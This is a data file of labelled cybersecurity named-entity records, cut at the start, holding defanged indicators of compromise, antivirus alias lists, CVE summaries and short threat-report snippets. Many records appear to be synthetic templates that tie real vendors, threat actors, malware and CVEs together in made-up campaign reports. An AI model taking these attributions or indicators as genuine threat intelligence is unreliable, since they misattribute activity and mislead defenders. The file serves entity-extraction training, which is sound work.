"Indicator: W32.Virut.CF": [[96, 112]]}, "info": {"id": "cyner2_train_007002", "source": "defanged_augment"}} {"text": "A backdoor also known as: Trojan-Proxy/W32.Mitglieder.8304 Trojan/Proxy.Mitglieder.af TrojanProxy.Mitglied!TVlYB86T2l0 Trojan.Mitglieder.G Win32/Mitglieder.Z TSPY_TARNO.D Trojan.Win32.Mitglieder.dkdz TrojWare.Win32.TrojanProxy.Mitglieder.AF Trojan.Mitglieder.Win32.173 TSPY_TARNO.D BehavesLike.Win32.Downloader.xc W32/Mitglieder.M TrojanProxy.Mitglieder.h Win32.Troj.Mitglieder.af.kcloud TrojanProxy:Win32/Mitglieder[.]DK Win-Trojan/Mitglieder.8304 Trojan-Proxy.Win32.Mitglieder.e Trojan.Win32.Mitglieder.aTNT Win32/TrojanProxy.Mitglieder.AF Win32.Trojan-proxy.Mitglieder.Ectn Trojan-Proxy.Win32.Mitglieder.CL W32/Tarno.D!tr Proxy.4.AZ Win32/Trojan.63b", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Mitglieder.DK": [[406, 421]]}, "info": {"id": "cyner2_train_005579", "source": "defanged_augment"}} {"text": "IOC Bulletin - AsyncRAT Campaign:\nNetwork Indicators:\n- 10[.]78[.]251[.]38\n- 102 [ . ] 184 [ . ] 101 [ . ] 207\n- 172 [ . ] 188 [ . ] 57 [ . ] 178\n- sync-auth[ . ]online\n- cdn-storage[ . ]info\nURLs:\n- hxxps://backup-mail[.]tech/secure/token\n- hxxp://secureauth[ . ]site/wp-content/uploads/doc.php\nEmail Senders:\n- it@credential-check[ . 
]site\n- contact@identity-verify[.]cc\nFile Indicators:\n- MD5: 5a379577ed538e85d6937eaf93624e64\n- MD5: 65a7513e39ca007ffe47222540750fb5\n- Drop path: C:\\Users\\admin\\AppData\\Local\\Temp\\dropper.ps1", "spans": {"Malware: AsyncRAT": [[15, 23]], "Indicator: 10.78.251.38": [[56, 74]], "Indicator: 102.184.101.207": [[77, 110]], "Indicator: 172.188.57.178": [[113, 145]], "Indicator: sync-auth.online": [[148, 168]], "Indicator: cdn-storage.info": [[171, 191]], "Indicator: https://backup-mail.tech/secure/token": [[200, 239]], "Indicator: hxxp://secureauth.site/wp-content/uploads/doc.php": [[242, 295]], "Indicator: it@credential-check.site": [[313, 341]], "Indicator: contact@identity-verify.cc": [[344, 372]], "Indicator: 5a379577ed538e85d6937eaf93624e64": [[397, 429]], "Indicator: 65a7513e39ca007ffe47222540750fb5": [[437, 469]]}, "info": {"id": "synth_v2_01358", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Secureworks identified a large-scale phishing operation. Emails originated from hr@phishing-domain[ . ]com and admin@secure-verify[ . ]net, spoofing legitimate services. Victims were directed to hxxp://relay-gateway[ . ]club/download/update.exe which hosted a credential harvesting page on securesecure[.]tech. A secondary link hxxps://cache-node[.]club/gate.php delivered Vidar (MD5: 2531025e366c96da685e058bf681502a). The malware was saved to /dev/shm/chrome_helper.exe and established C2 with 10 [ . ] 104 [ . ] 230 [ . 
] 135.", "spans": {"Organization: Secureworks": [[26, 37]], "Indicator: hr@phishing-domain.com": [[106, 132]], "Indicator: admin@secure-verify.net": [[137, 164]], "Indicator: hxxp://relay-gateway.club/download/update.exe": [[221, 270]], "Indicator: securesecure.tech": [[316, 335]], "Indicator: https://cache-node.club/gate.php": [[354, 388]], "Malware: Vidar": [[399, 404]], "Indicator: 2531025e366c96da685e058bf681502a": [[411, 443]], "Indicator: 10.104.230.135": [[522, 554]]}, "info": {"id": "synth_v2_01008", "source": "defanged_augment"}} {"text": "CVE-2026-6122: A vulnerability has been found in Tenda F451 1 [ . ] 0 [ . ] 0 [ . ] 7. Affected by this issue is the function frmL7ProtForm of the file /goform/L7Prot of the component httpd. Such manipulation of the argument page leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.", "spans": {"Vulnerability: CVE-2026-6122": [[0, 13]], "Vulnerability: buffer overflow": [[251, 266]], "Indicator: 1.0.0.7": [[60, 85]]}, "info": {"id": "nvd_2026_6122", "source": "defanged_augment"}} {"text": "Extract the contacts list from the Facebook app . The Remsec malware used by Strider has a modular design . This backdoor allows attackers to spy on targeted victims . This includes hosting C&C domains that were used by Winnti such as mtrue[.]com , shenqi[.]kr and zhu[.]kr .", "spans": {"System: Facebook app": [[35, 47]], "Malware: backdoor": [[113, 121]], "Indicator: mtrue.com": [[235, 246]]}, "info": {"id": "cyberner_stix_train_000247", "source": "defanged_augment"}} {"text": "'' The report said HummingBad apps are developed by Yingmob , a Chinese mobile ad server company that other researchers claim is behind the Yinspector iOS malware . These and other tools used by the Lazarus group can be mitigated by routinely scanning the network for any malicious activity to help prevent the malware from entering and spreading through an organization . 
APT33 : 64[.]251[.]19[.]214 mynetwork[ . ]ddns[ . ]net . To perform analysis of NetScaler memory core dump files , they need to be collected .", "spans": {"Malware: HummingBad": [[19, 29]], "Organization: Yingmob": [[52, 59]], "Malware: Yinspector": [[140, 150]], "System: iOS": [[151, 154]], "Indicator: 64.251.19.214": [[381, 400]], "Indicator: mynetwork.ddns.net": [[401, 427]], "System: NetScaler memory core dump files": [[453, 485]]}, "info": {"id": "cyberner_stix_train_005783", "source": "defanged_augment"}} {"text": "In the injected payload , the module implements the method ‘ callActivityOnCreate ’ . This week we are going to discuss Clever Kitten , whom , by virtue of several indicators , we have affiliated with the Islamic Republic of Iran . It removes setup[.]exe ’s contents and replaces them with the third decrypted executable , a cryptocurrency miner . Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected .", "spans": {"Indicator: setup.exe": [[243, 254]], "Organization: Malwarebytes EDR and MDR": [[348, 372]]}, "info": {"id": "cyberner_stix_train_007286", "source": "defanged_augment"}} {"text": "TG-3390 : 66 [ . ] 63 [ . ] 178 [ . ] 142 .", "spans": {"Indicator: 66.63.178.142": [[10, 41]]}, "info": {"id": "cyberner_stix_train_005472", "source": "defanged_augment"}} {"text": "Microsoft MSRC published a threat intelligence report linking Kimsuky to a new campaign exploiting CVE-2023-34911 in Palo Alto PAN-OS. The attackers deployed Ryuk via LaZagne, establishing C2 communication with 209[.]181[.]136[.]204 and data-backup[.]top. A secondary payload was downloaded from hxxp://cdn-api[ . ]site/callback. The malware binary (SHA1: 8247cd21680ad26bf8e89a426617762360a7c176) was dropped to /dev/shm/update.dll. Phishing emails were sent from admin@account-update[ . ]xyz targeting enterprise users. A backup C2 server was identified at 21 [ . ] 191 [ . ] 207 [ . 
] 118.", "spans": {"Organization: Microsoft MSRC": [[0, 14]], "Vulnerability: CVE-2023-34911": [[99, 113]], "System: Palo Alto PAN-OS": [[117, 133]], "Malware: Ryuk": [[158, 162]], "Indicator: 209.181.136.204": [[211, 232]], "Indicator: data-backup.top": [[237, 254]], "Indicator: http://cdn-api.site/callback": [[296, 328]], "Indicator: 8247cd21680ad26bf8e89a426617762360a7c176": [[356, 396]], "Indicator: admin@account-update.xyz": [[465, 493]], "Indicator: 21.191.207.118": [[559, 591]]}, "info": {"id": "synth_v2_00083", "source": "defanged_augment"}} {"text": "IOC Bulletin - Meduza Stealer Campaign:\nNetwork Indicators:\n- 195 [ . ] 3 [ . ] 154 [ . ] 254\n- 10 [ . ] 213 [ . ] 26 [ . ] 76\n- 10 [ . ] 242 [ . ] 45 [ . ] 95\n- proxyedge[.]tech\n- api-cache[ . ]online\nURLs:\n- hxxps://portal-edge[ . ]site/collect\n- hxxps://api-gateway[.]com/admin/config\nEmail Senders:\n- admin@secure-verify[.]net\n- support@auth-check[ . ]org\nFile Indicators:\n- SHA1: 5a1ba9639e0aca120d7058eccbb078f1c04207e7\n- SHA256: ccc24be92f4312adb74e854f2efe2f66b9b8e983dd4bb852805e0d29aa2eedd6\n- Drop path: /etc/cron.d/dropper.ps1", "spans": {"Malware: Meduza Stealer": [[15, 29]], "Indicator: 195.3.154.254": [[62, 93]], "Indicator: 10.213.26.76": [[96, 126]], "Indicator: 10.242.45.95": [[129, 159]], "Indicator: proxyedge.tech": [[162, 178]], "Indicator: api-cache.online": [[181, 201]], "Indicator: hxxps://portal-edge.site/collect": [[210, 246]], "Indicator: https://api-gateway.com/admin/config": [[249, 287]], "Indicator: admin@secure-verify.net": [[305, 330]], "Indicator: support@auth-check.org": [[333, 359]], "Indicator: 5a1ba9639e0aca120d7058eccbb078f1c04207e7": [[385, 425]], "Indicator: ccc24be92f4312adb74e854f2efe2f66b9b8e983dd4bb852805e0d29aa2eedd6": [[436, 500]]}, "info": {"id": "synth_v2_01359", "source": "defanged_augment"}} {"text": "Artifact Analysis for StealC campaign:\nStage 1 dropper at C:\\Users\\admin\\Downloads\\ntds.dit - SHA1: dd6808993c5c589f57a878f242e4525f93705d98\nStage 
2 loader at /var/tmp/config.dat - MD5: a4b2192dfdce0207a01ff7433ab99424\nFinal payload at C:\\ProgramData\\loader.exe - MD5: 400c4608aa1abfa7cd3a44d46bfb4d23\nExfiltration module - MD5: 13c0df09d121beb4784e0c67b79284bc\nAll stages communicated with 26 [ . ] 31 [ . ] 177 [ . ] 196. Nmap signatures detected in Stage 2.", "spans": {"Malware: StealC": [[22, 28]], "Indicator: dd6808993c5c589f57a878f242e4525f93705d98": [[100, 140]], "Indicator: a4b2192dfdce0207a01ff7433ab99424": [[186, 218]], "Indicator: 400c4608aa1abfa7cd3a44d46bfb4d23": [[269, 301]], "Indicator: 13c0df09d121beb4784e0c67b79284bc": [[329, 361]], "Indicator: 26.31.177.196": [[391, 422]]}, "info": {"id": "synth_v2_01933", "source": "defanged_augment"}} {"text": "TensorFlow is an end-to-end open source platform for machine learning. In affected versions an attacker can trigger a read from outside of bounds of heap allocated data by sending invalid arguments to `tf.raw_ops.ResourceScatterUpdate`. The [implementation](hxxps://github[.]com/tensorflow/tensorflow/blob/f24faa153ad31a4b51578f8181d3aaab77a1ddeb/tensorflow/core/kernels/resource_variable_ops.cc#L919-L923) has an incomplete validation of the relationship between the shapes of `indices` and `updates`: instead of checking that the shape of `indices` is a prefix of the shape of `updates` (so that broadcasting can happen), code only checks that the number of elements in these two tensors are in a divisibility relationship. We have patched the issue in GitHub commit 01cff3f986259d661103412a20745928c727326f. The fix will be included in TensorFlow 2.6.0. 
We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.", "spans": {"Indicator: https://github.com/tensorflow/tensorflow/blob/f24faa153ad31a4b51578f8181d3aaab77a1ddeb/tensorflow/core/kernels/resource_variable_ops.cc#L919-L923": [[258, 405]], "Indicator: 01cff3f986259d661103412a20745928c727326f": [[769, 809]], "Organization: GitHub": [[755, 761]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-37655"}} {"text": "INTERPOL published a threat intelligence report linking Diamond Sleet to a new campaign exploiting CVE-2022-47837 in Cisco ASA. The attackers deployed BumbleBee via WinPEAS, establishing C2 communication with 192[.]164[.]144[.]98 and nodeproxy[.]online. A secondary payload was downloaded from hxxp://proxy-storage[.]dev/secure/token. The malware binary (MD5: 022c81682909faba6eec771009ea0cb5) was dropped to C:\\Program Files\\Common Files\\update.dll. Phishing emails were sent from notification@login-portal[ . ]tech targeting enterprise users. A backup C2 server was identified at 137 [ . ] 183 [ . ] 157 [ . ] 67.", "spans": {"Organization: INTERPOL": [[0, 8]], "Vulnerability: CVE-2022-47837": [[99, 113]], "System: Cisco ASA": [[117, 126]], "Malware: BumbleBee": [[151, 160]], "Indicator: 192.164.144.98": [[209, 229]], "Indicator: nodeproxy.online": [[234, 252]], "Indicator: hxxp://proxy-storage.dev/secure/token": [[294, 333]], "Indicator: 022c81682909faba6eec771009ea0cb5": [[360, 392]], "Indicator: notification@login-portal.tech": [[482, 516]], "Indicator: 137.183.157.67": [[582, 614]]}, "info": {"id": "synth_v2_00080", "source": "defanged_augment"}} {"text": "Zscaler ThreatLabz published a threat intelligence report linking Volt Typhoon to a new campaign exploiting CVE-2025-48311 in Fortinet FortiGate. The attackers deployed NjRAT via PowerView, establishing C2 communication with 33 [ . ] 13 [ . ] 201 [ . ] 152 and securecdn[ . ]info. 
A secondary payload was downloaded from hxxps://storagecloud[.]online/secure/token. The malware binary (MD5: 40a194b4d4cb5d64805d497691b575e3) was dropped to /usr/local/bin/ntds.dit. Phishing emails were sent from hr@secure-verify[.]net targeting enterprise users. A backup C2 server was identified at 10 [ . ] 219 [ . ] 69 [ . ] 222.", "spans": {"Organization: Zscaler ThreatLabz": [[0, 18]], "Vulnerability: CVE-2025-48311": [[108, 122]], "System: Fortinet FortiGate": [[126, 144]], "Malware: NjRAT": [[169, 174]], "Indicator: 33.13.201.152": [[225, 256]], "Indicator: securecdn.info": [[261, 279]], "Indicator: https://storagecloud.online/secure/token": [[321, 363]], "Indicator: 40a194b4d4cb5d64805d497691b575e3": [[390, 422]], "Indicator: hr@secure-verify.net": [[495, 517]], "Indicator: 10.219.69.222": [[583, 614]]}, "info": {"id": "synth_v2_00016", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Sophos X-Ops identified a large-scale phishing operation. Emails originated from admin@document-share[.]link and notification@identity-verify[ . ]cc, spoofing legitimate services. Victims were directed to hxxp://auth-edge[.]dev/callback which hosted a credential harvesting page on gatewayapi[ . ]com. A secondary link hxxp://relayrelay[ . ]net/callback delivered BlackCat (SHA1: fc7a98ac71a83bff54b4cdedbbe647e9fc615c69). 
The malware was saved to C:\\Users\\admin\\Desktop\\helper.sh and established C2 with 45[.]16[.]68[.]204.", "spans": {"Organization: Sophos X-Ops": [[26, 38]], "Indicator: admin@document-share.link": [[107, 134]], "Indicator: notification@identity-verify.cc": [[139, 174]], "Indicator: hxxp://auth-edge.dev/callback": [[231, 262]], "Indicator: gatewayapi.com": [[308, 326]], "Indicator: http://relayrelay.net/callback": [[345, 379]], "Malware: BlackCat": [[390, 398]], "Indicator: fc7a98ac71a83bff54b4cdedbbe647e9fc615c69": [[406, 446]], "Indicator: 45.16.68.204": [[531, 549]]}, "info": {"id": "synth_v2_01031", "source": "defanged_augment"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Ligolo artifacts at /opt/app/bin/csrss.exe. Memory dump analysis confirmed execution of Rubeus. Registry modifications pointed to persistence via C:\\Users\\admin\\Downloads\\helper.sh. Network forensics identified connections to 172[.]98[.]233[.]166 and cdnbackup[.]online. Email headers traced the initial vector to ceo@login-portal[.]tech. File C:\\Users\\admin\\Downloads\\payload.bin (SHA1: 21bb4dcaf516182cad3981db9bb87cb1f7f5e166) was identified as the initial dropper. A staging URL hxxps://cdnauth[ . ]net/secure/token resolved to 163 [ . ] 155 [ . ] 120 [ . ] 90. Secondary artifact hash: SHA1: 13618451d5c53e92871c56707c861acb5e3a91dd.", "spans": {"Indicator: 172.98.233.166": [[298, 318]], "Indicator: cdnbackup.online": [[323, 341]], "Indicator: ceo@login-portal.tech": [[386, 409]], "Indicator: 21bb4dcaf516182cad3981db9bb87cb1f7f5e166": [[460, 500]], "Indicator: hxxps://cdnauth.net/secure/token": [[555, 591]], "Indicator: 163.155.120.90": [[604, 636]], "Indicator: 13618451d5c53e92871c56707c861acb5e3a91dd": [[669, 709]]}, "info": {"id": "synth_v2_01253", "source": "defanged_augment"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Covenant artifacts at /home/user/.config/csrss.exe. 
Memory dump analysis confirmed execution of CrackMapExec. Registry modifications pointed to persistence via /etc/cron.d/winlogon.exe. Network forensics identified connections to 35[.]242[.]95[.]140 and syncportal[ . ]net. Email headers traced the initial vector to info@auth-check[.]org. File /var/tmp/sam.hive (SHA1: 1076081d3c86a6b206b8fdd633df129e93b8446d) was identified as the initial dropper. A staging URL hxxp://mailgateway[ . ]club/callback resolved to 172 [ . ] 233 [ . ] 102 [ . ] 64. Secondary artifact hash: SHA256: c4ce8f71359818bf567a3623886bf75a36678f4055a693531481182d6ea4900e.", "spans": {"Indicator: 35.242.95.140": [[302, 321]], "Indicator: syncportal.net": [[326, 344]], "Indicator: info@auth-check.org": [[389, 410]], "Indicator: 1076081d3c86a6b206b8fdd633df129e93b8446d": [[442, 482]], "Indicator: hxxp://mailgateway.club/callback": [[537, 573]], "Indicator: 172.233.102.64": [[586, 618]], "Indicator: c4ce8f71359818bf567a3623886bf75a36678f4055a693531481182d6ea4900e": [[653, 717]]}, "info": {"id": "synth_v2_01111", "source": "defanged_augment"}} {"text": "TensorFlow is an end-to-end open source platform for machine learning. An attacker can trigger a denial of service via a `CHECK`-fail in `tf.raw_ops.SparseConcat`. This is because the implementation(hxxps://github[.]com/tensorflow/tensorflow/blob/b432a38fe0e1b4b904a6c222cbce794c39703e87/tensorflow/core/kernels/sparse_concat_op.cc#L76) takes the values specified in `shapes[0]` as dimensions for the output shape. The `TensorShape` constructor(hxxps://github[.]com/tensorflow/tensorflow/blob/6f9896890c4c703ae0a0845394086e2e1e523299/tensorflow/core/framework/tensor_shape.cc#L183-L188) uses a `CHECK` operation which triggers when `InitDims`(hxxps://github[ . ]com/tensorflow/tensorflow/blob/6f9896890c4c703ae0a0845394086e2e1e523299/tensorflow/core/framework/tensor_shape.cc#L212-L296) returns a non-OK status. 
This is a legacy implementation of the constructor and operations should use `BuildTensorShapeBase` or `AddDimWithStatus` to prevent `CHECK`-failures in the presence of overflows. The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.", "spans": {"Indicator: https://github.com/tensorflow/tensorflow/blob/b432a38fe0e1b4b904a6c222cbce794c39703e87/tensorflow/core/kernels/sparse_concat_op.cc#L76": [[199, 335]], "Indicator: https://github.com/tensorflow/tensorflow/blob/6f9896890c4c703ae0a0845394086e2e1e523299/tensorflow/core/framework/tensor_shape.cc#L183-L188": [[445, 585]], "Indicator: https://github.com/tensorflow/tensorflow/blob/6f9896890c4c703ae0a0845394086e2e1e523299/tensorflow/core/framework/tensor_shape.cc#L212-L296": [[643, 785]], "Vulnerability: denial of service": [[97, 114]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-29534"}} {"text": "A backdoor also known as: Backdoor.Protux Backdoor/Protux.wz Trojan.Win32.Protux.pdpbh Backdoor.Trojan Protux.AO Backdoor[.]Win32[.]Protux[.]ws Backdoor.Protux!x0RB0sLZXQU Win32.HLLW.Autoruner1.4496 BDS/Protux[.]ws Heuristic.BehavesLike.Win32.Backdoor.H Backdoor/Protux.ht Win32.Troj.Undef.kcloud Backdoor.Win32.A.Protux.102400.A Backdoor/Win32.Trojan Backdoor.Protux Backdoor.Trojan Backdoor.Win32.Protux W32/Protux[.]WS!tr.bdr Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Backdoor.Win32.Protux.ws": [[113, 143]], "Indicator: Protux.ws": [[203, 214]], "Indicator: Protux.WS": [[410, 421]]}, "info": {"id": "cyner2_train_005721", "source": "defanged_augment"}} {"text": "Malware Analysis Report: StealC (MD5: d1d73e5ff5a3db1b6a39937ab37c527d). Upon execution on Citrix NetScaler, the sample creates C:\\Users\\admin\\Downloads\\agent.py and injects into legitimate processes. 
Network analysis shows beaconing to 77[.]20[.]119[.]196 every 60 seconds and DNS queries to gateway-gateway[.]link. The second stage was fetched from hxxps://cacheportal[ . ]cc/download/update.exe and written to /tmp/shell.php. The payload uses Seatbelt-style techniques for defense evasion. A secondary hash (MD5: 7b2be7b513142692a3102cb45f962bdb) was extracted from the unpacked payload.", "spans": {"Malware: StealC": [[25, 31]], "Indicator: d1d73e5ff5a3db1b6a39937ab37c527d": [[38, 70]], "System: Citrix NetScaler": [[91, 107]], "Indicator: 77.20.119.196": [[237, 256]], "Indicator: gateway-gateway.link": [[293, 315]], "Indicator: hxxps://cacheportal.cc/download/update.exe": [[351, 397]], "Indicator: 7b2be7b513142692a3102cb45f962bdb": [[516, 548]]}, "info": {"id": "synth_v2_00454", "source": "defanged_augment"}} {"text": "This High severity Remote Code Execution (RCE) vulnerability was introduced in version 7.13.0 of Confluence Data Center and Server.\n\nRemote Code Execution (RCE) vulnerability, with a CVSS Score of 8.6 and a CVSS Vector of CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N allows an unauthenticated attacker to expose assets in your environment susceptible to exploitation which has high impact to confidentiality, no impact to integrity, no impact to availability, and does not require user interaction.\n\nAtlassian recommends that Confluence Data Center and Server customers upgrade to latest version, if you are unable to do so, upgrade your instance to one of the specified supported fixed versions:\n\n* Confluence Data Center and Server 7.19: Upgrade to a release 7.19.18, or any higher 7.19.x release\n* Confluence Data Center and Server 8.5: Upgrade to a release 8.5.5 or any higher 8.5.x release\n* Confluence Data Center and Server 8.7: Upgrade to a release 8.7.2 or any higher release\n\nSee the release notes (hxxps://confluence[ . ]atlassian[ . ]com/doc/confluence-release-notes-327.html ). 
You can download the latest version of Confluence Data Center and Server from the download center (hxxps://www[ . ]atlassian[ . ]com/software/confluence/download-archives ).", "spans": {"Indicator: https://confluence.atlassian.com/doc/confluence-release-notes-327.html": [[1009, 1087]], "Indicator: https://www.atlassian.com/software/confluence/download-archives": [[1190, 1261]], "Organization: Atlassian": [[500, 509]], "Vulnerability: Remote Code Execution": [[19, 40], [133, 154]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-21674"}} {"text": "Backdoor[ . ]Zekapab is installed on selected infected computers and is capable of taking screenshots , executing files and commands , uploading and downloading files , performing registry and file system operations , and carrying out system information tasks .", "spans": {"Indicator: Backdoor.Zekapab": [[0, 20]]}, "info": {"id": "cyberner_stix_train_006277", "source": "defanged_augment"}} {"text": "HummingBad does this by silently installing promoted apps on infected phones , defrauding legitimate mobile advertisers , and creating fraudulent statistics inside the official Google Play Store . We also recently discovered that Lazarus successfully planted their backdoor ( detected by Trend Micro as BKDR_BINLODR.ZNFJ-A ) into several machines of financial institutions across Latin America . APT33 : 37 [ . ] 48 [ . ] 105 [ . ] 178 servhost[.]hopto[.]org . 
Others include Excel spreadsheets that contain socially engineered instructions on how to enable macros in Excel so that the malicious VBA code can be executed .", "spans": {"Malware: HummingBad": [[0, 10]], "System: Google Play Store": [[177, 194]], "Organization: Trend Micro": [[288, 299]], "Organization: financial institutions": [[350, 372]], "Indicator: 37.48.105.178": [[404, 435]], "Indicator: servhost.hopto.org": [[436, 458]]}, "info": {"id": "cyberner_stix_train_003623", "source": "defanged_augment"}} {"text": "IoCs C & C 100[.]51[.]100[.]00 108[.]62[.]118[.]131 172[.]81[.]134[.]165 172[.]86[.]120[.]207 185 [ . ] 212 [ . ] 128 [ . ] 152 185[.]212[.]128[.]192 185 [ . ] 61 [ . ] 000 [ . ] 108 185 [ . ] 61 [ . ] 138 [ . ] 108 185 [ . ] 61 [ . ] 138 [ . ] 37 188[.]209[.]52[.]101 5 [ . ] 206 [ . ] 225 [ . ] 57 alr992.date avito-app[.]pw backfround2[.]pw background1[ . ]xyz blacksolider93[ . ]com blass9g087[ . ]com brekelter2[ . ]com broplar3hf[.]xyz buy-youla[.]ru cd78cg210xy0[.]com copsoiteess[ . ]com farmatefc93[.]org firstclinsop[.]com holebrhuhh3[.]com holebrhuhh45[.]com karambga3j[.]net le22999a[ . ]pw leboncoin-bk[.]top leboncoin-buy[.]pw leboncoin-cz[.]info leboncoin-f[ . ]pw leboncoin-jp[ . ]info leboncoin-kp[.]top leboncoin-ny[.]info leboncoin-ql[.]top leboncoin-tr[ . ]info myyoula[.]ru sell-avito[.]ru sell-youla[ . ]ru sentel8ju67[.]com subito-li[ . ]pw subitop[ . ]pw web-gumtree[.]com whitehousejosh[.]com whitekalgoy3[ . ]com youlaprotect[ . 
]ru Examples of malware 0497b6000a7a23e9e9b97472bc2d3799caf49cbbea1627ad4d87ae6e0b7e2a98 417fc112cd0610cc8c402742b0baab0a086b5c4164230009e11d34fdeee7d3fa 54594edbe9055517da2836199600f682dee07e6b405c6fe4b476627e8d184bfe 6e995d68c724f121d43ec2ff59bc4e536192360afa3beaec5646f01094f0b745 bbc268ca63eeb27e424fec1b3976bab550da304de18e29faff94d9057b1fa25a dc3dd9d75120934333496d0a4100252b419ee8fcdab5d74cf343bcb0306c9811 e3f77ff093f322e139940b33994c5a57ae010b66668668dc4945142a81bcc049 ebd0a8043434edac261cb25b94f417188a5c0d62b5dd4033f156b890d150a4c5 f51a27163cb0ddd08caa29d865b9f238848118ba2589626af711330481b352df Tracking down the developer of Android adware affecting millions of users 24 Oct 2019 - 11:30AM We detected a large adware campaign running for about a year , with the involved apps installed eight million times from Google Play alone .", "spans": {"System: Android": [[1595, 1602]], "System: Google Play": [[1781, 1792]], "Indicator: 0497b6000a7a23e9e9b97472bc2d3799caf49cbbea1627ad4d87ae6e0b7e2a98": [[979, 1043]], "Indicator: 417fc112cd0610cc8c402742b0baab0a086b5c4164230009e11d34fdeee7d3fa": [[1044, 1108]], "Indicator: 54594edbe9055517da2836199600f682dee07e6b405c6fe4b476627e8d184bfe": [[1109, 1173]], "Indicator: 6e995d68c724f121d43ec2ff59bc4e536192360afa3beaec5646f01094f0b745": [[1174, 1238]], "Indicator: bbc268ca63eeb27e424fec1b3976bab550da304de18e29faff94d9057b1fa25a": [[1239, 1303]], "Indicator: dc3dd9d75120934333496d0a4100252b419ee8fcdab5d74cf343bcb0306c9811": [[1304, 1368]], "Indicator: e3f77ff093f322e139940b33994c5a57ae010b66668668dc4945142a81bcc049": [[1369, 1433]], "Indicator: ebd0a8043434edac261cb25b94f417188a5c0d62b5dd4033f156b890d150a4c5": [[1434, 1498]], "Indicator: f51a27163cb0ddd08caa29d865b9f238848118ba2589626af711330481b352df": [[1499, 1563]], "Indicator: 100.51.100.00": [[11, 30]], "Indicator: 108.62.118.131": [[31, 51]], "Indicator: 172.81.134.165": [[52, 72]], "Indicator: 172.86.120.207": [[73, 93]], "Indicator: 185.212.128.152": [[94, 127]], 
"Indicator: 185.212.128.192": [[128, 149]], "Indicator: 185.61.000.108": [[150, 182]], "Indicator: 185.61.138.108": [[183, 215]], "Indicator: 185.61.138.37": [[216, 247]], "Indicator: 188.209.52.101": [[248, 268]], "Indicator: 5.206.225.57": [[269, 299]], "Indicator: avito-app.pw": [[312, 326]], "Indicator: backfround2.pw": [[327, 343]], "Indicator: background1.xyz": [[344, 363]], "Indicator: blacksolider93.com": [[364, 386]], "Indicator: blass9g087.com": [[387, 405]], "Indicator: brekelter2.com": [[406, 424]], "Indicator: broplar3hf.xyz": [[425, 441]], "Indicator: buy-youla.ru": [[442, 456]], "Indicator: cd78cg210xy0.com": [[457, 475]], "Indicator: copsoiteess.com": [[476, 495]], "Indicator: farmatefc93.org": [[496, 513]], "Indicator: firstclinsop.com": [[514, 532]], "Indicator: holebrhuhh3.com": [[533, 550]], "Indicator: holebrhuhh45.com": [[551, 569]], "Indicator: karambga3j.net": [[570, 586]], "Indicator: le22999a.pw": [[587, 602]], "Indicator: leboncoin-bk.top": [[603, 621]], "Indicator: leboncoin-buy.pw": [[622, 640]], "Indicator: leboncoin-cz.info": [[641, 660]], "Indicator: leboncoin-f.pw": [[661, 679]], "Indicator: leboncoin-jp.info": [[680, 701]], "Indicator: leboncoin-kp.top": [[702, 720]], "Indicator: leboncoin-ny.info": [[721, 740]], "Indicator: leboncoin-ql.top": [[741, 759]], "Indicator: leboncoin-tr.info": [[760, 781]], "Indicator: myyoula.ru": [[782, 794]], "Indicator: sell-avito.ru": [[795, 810]], "Indicator: sell-youla.ru": [[811, 828]], "Indicator: sentel8ju67.com": [[829, 846]], "Indicator: subito-li.pw": [[847, 863]], "Indicator: subitop.pw": [[864, 878]], "Indicator: web-gumtree.com": [[879, 896]], "Indicator: whitehousejosh.com": [[897, 917]], "Indicator: whitekalgoy3.com": [[918, 938]], "Indicator: youlaprotect.ru": [[939, 958]]}, "info": {"id": "cyner2_train_000517", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Volexity identified a large-scale phishing operation. Emails originated from support@login-portal[ . 
]tech and security@phishing-domain[ . ]com, spoofing legitimate services. Victims were directed to hxxps://auth-static[.]online/api/v2/auth which hosted a credential harvesting page on authdata[ . ]net. A secondary link hxxp://sync-cdn[.]com/portal/verify delivered Qbot (SHA256: d0b5484a1aaddea8fa4a6fca035c1e996bd14e1021c62ac152cd24e41daf0fc2). The malware was saved to C:\\Windows\\Tasks\\dropper.ps1 and established C2 with 12 [ . ] 53 [ . ] 198 [ . ] 227.", "spans": {"Organization: Volexity": [[26, 34]], "Indicator: support@login-portal.tech": [[103, 132]], "Indicator: security@phishing-domain.com": [[137, 169]], "Indicator: hxxps://auth-static.online/api/v2/auth": [[226, 266]], "Indicator: authdata.net": [[312, 328]], "Indicator: hxxp://sync-cdn.com/portal/verify": [[347, 382]], "Malware: Qbot": [[393, 397]], "Indicator: d0b5484a1aaddea8fa4a6fca035c1e996bd14e1021c62ac152cd24e41daf0fc2": [[407, 471]], "Indicator: 12.53.198.227": [[552, 583]]}, "info": {"id": "synth_v2_00926", "source": "defanged_augment"}} {"text": "While not too seriously , these elements made us restrict our research into surveillance companies from the region . Ongoing activity from attack groups like TA459 who consistently target individuals specializing in particular areas of research and expertise further complicate an already difficult security situation for organizations dealing with more traditional malware threats , phishing campaigns , and socially engineered threats every day . hxxp://linda-callaghan[ . ]icu/Minkowski/brown . 
